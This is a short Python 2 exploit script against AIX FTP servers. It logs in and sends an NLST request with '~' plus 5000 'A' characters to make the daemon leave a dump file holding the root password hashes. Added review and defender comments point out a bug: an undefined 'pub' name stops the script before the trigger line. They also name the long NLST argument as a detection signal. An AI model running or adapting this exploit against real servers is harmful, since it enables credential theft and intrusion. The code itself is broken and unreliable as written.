rewrite of Kingcopes AIX FTP root hash disclosure vuln
#!/usr/bin/python
###################
#
#
#
# Rewrite of Kingcopes AIX FTP root hash disclosure vuln
# Conversion by GraphX
# Because fuck Perl
#
#######################################################
from ftplib import FTP
import io
import os
import sys, getopt
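def main(argv):
    """Parse the command-line options and hand them to fexploit().

    Args:
        argv: Argument list without the program name (i.e. sys.argv[1:]).

    Recognised options are -h/--host, -u/--user and -p/--password. The usage
    line is printed and the process exits with status 2 when an option is not
    recognised or when no host is supplied. User and password default to
    empty strings.
    """
    usage = 'ftpdump.py usage: ftpdump.py -h <host> -u <username> -p <password>'
    host = ''
    user = ''
    password = ''
    try:
        opts, _unused = getopt.getopt(
            argv, "h:u:p:", ["host=", "user=", "password="]
        )
    except getopt.GetoptError:
        # Single-argument print(...) behaves the same on Python 2 and 3.
        print(usage)
        sys.exit(2)
    for opt, arg in opts:
        # The long spellings are declared to getopt above, so they must be
        # matched here as well; otherwise they are parsed and then dropped.
        if opt in ('-h', '--host'):
            host = arg
        elif opt in ('-u', '--user'):
            user = arg
        elif opt in ('-p', '--password'):
            # NOTE: a password given on the command line is visible in the
            # process list and in shell history.
            password = arg
    if not host:
        # Without a host there is nothing to connect to; treat it as a usage
        # error instead of failing later with an unrelated exception.
        print(usage)
        sys.exit(2)
    fexploit(host, user, password)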
def fexploit(h,u,p):
    """Log in to an FTP server and send one NLST request with an oversized argument.

    Args:
        h: FTP server host name or address.
        u: FTP user name.
        p: FTP password.

    Returns nothing; progress and any caught exception text are printed.

    NOTE(review): written for Python 2 (print statements and the
    `except Exception, e` form); it does not parse under Python 3.
    NOTE(review): the FTP object is never closed with quit()/close().

    Defender notes: the request this function sends is an NLST whose argument
    is '~' followed by 5000 'A' characters. A listing argument of that length
    is abnormal and is a usable signal in FTP server logs or network captures.
    The file header describes the outcome as root hash disclosure and the
    success message refers to a dump file -- presumably a core dump written
    by the FTP daemon; confirm against the vendor advisory. A daemon dump
    file that FTP users can read should be handled as credential exposure.
    """
    # 5000-character filler used as the NLST argument below.
    buff = 'A'*5000
    # ftplib.FTP(host) connects during construction; this sits outside the
    # try block, so a connection failure propagates to the caller uncaught.
    ftp = FTP(h)
    try:
        print '[*] attempting FTP login'
        ftp.login(u,p)
        print '[*] using pub directory'
        # NOTE(review): `pub` is a bare name that is not defined anywhere in
        # this listing, so this line raises NameError, which the handler
        # below catches and prints; the statements after it are not reached.
        ftp.cwd(pub)
        print '[*] attempting to trigger vulnerability'
        # Sends NLST with '~' + buff as its argument.
        ftp.nlst('~' + buff)
        # Only states that no exception was raised; nothing here verifies
        # that the server was actually affected.
        print '[*] no errors, I think we\'re good. Go look for that dump file'
    except Exception, e:
        # Broad catch: login failures, FTP error replies and programming
        # errors are all reduced to one printed line.
        print str(e)
# Script entry point: forward the command-line arguments (without the program
# name) to main() only when the file is executed directly, not when imported.
if __name__ == '__main__':
    cli_args = sys.argv[1:]
    main(cli_args)